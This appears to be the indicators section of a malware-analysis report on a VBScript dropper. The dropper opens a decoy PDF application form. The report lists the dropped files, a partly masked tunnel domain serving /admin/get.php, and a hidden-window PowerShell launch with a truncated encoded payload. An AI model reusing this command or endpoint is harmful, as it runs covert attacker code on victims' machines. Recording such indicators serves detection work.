Technical Information
- <Current directory>\silencerr.vbs
- <Current directory>\applicationform.pdf
- <Current directory>\main_silencer.vbs
- '8f#######2eafa.lhrtunnel.link':80
- http://8f#######2eafa.lhrtunnel.link/admin/get.php
- DNS ASK 8f#######2eafa.lhrtunnel.link
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "<Current directory>\Main_silencer.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nOpROfiLE -WiN hiDdEn -eNCODe SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAe...' (with hidden window)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "<Current directory>\ApplicationForm.pdf"